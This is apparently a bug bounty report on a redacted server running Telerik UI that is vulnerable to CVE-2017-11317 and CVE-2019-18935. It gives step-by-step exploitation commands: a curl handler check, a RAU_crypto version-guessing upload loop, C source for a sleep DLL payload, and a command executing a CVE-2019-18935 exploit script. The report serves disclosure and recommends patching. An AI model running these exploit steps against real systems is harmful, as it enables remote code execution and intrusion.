9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.908 High
EPSS
Percentile
98.3%
Description:
https://██████/██████████/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.
https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui
An attacker can execute code on the vulnerable server, allowing an attacker to gain a foothold and exfiltrate data. Depending on the security posture of the underlying system, an attacker may be able to escalate privileges or laterally move to other systems within the network using this access.
████
Telerik UI Version ███
CVE-2017-11317, CVE-2019-18935
First, confirm the file upload handler is registered by issuing the following request:
curl -sk https://██████████/██████████/Telerik.Web.UI.WebResource.axd?type=rau
You should see the following response:
{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }
Next, you will need to install RAU_crypto
(https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests with known vulnerable versions until finding the correct version. After RAU_crypto
has been installed, you can use the following script (with the attached versions.txt file):
echo 'test' > testfile.txt
for VERSION in $(cat versions.txt); do
echo -n "$VERSION: "
python3 RAU_crypto.py -P '█████' "$VERSION" testfile.txt https://█████████/█████/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo
done
This uploads a file (in this case, testfile.txt
) to the █████
directory on the target server. The contents of my testfile.txt
simply included the word “test”.
The script should eventually identify a vulnerable version (████████
), indicating the file upload succeeded and showing an encrypted blob of data related to the uploaded file:
█████████: {"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":█████ }
Now that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we can compile and upload a DLL that causes the server to sleep for 10 seconds before responding:
#include <windows.h>
#include <stdio.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
if (fdwReason == DLL_PROCESS_ATTACH)
Sleep(10000); // Time interval in milliseconds.
return TRUE;
}
As a .NET application will only load an assembly once with a given name, the dll from my test will only successfully sleep the server on the first exploit. I have compiled and attached an unused dll for testing purposes if desired (if not, just follow the steps from the link in the references section).
Now that we have our test payload ready, we can use the attached CVE-2019-18935.py script to upload and execute the dll.
python3 CVE-2019-18935.py -u https://███████/███/Telerik.Web.UI.WebResource.axd?type=rau -v ██████████ -f '███' -p sleep_2020070207013954_amd64.dll
> Note: I’m having trouble getting the server to sleep with the crafted .dll
. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can’t get execution.
Update TelerikUI to the latest (or a patched) version.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.908 High
EPSS
Percentile
98.3%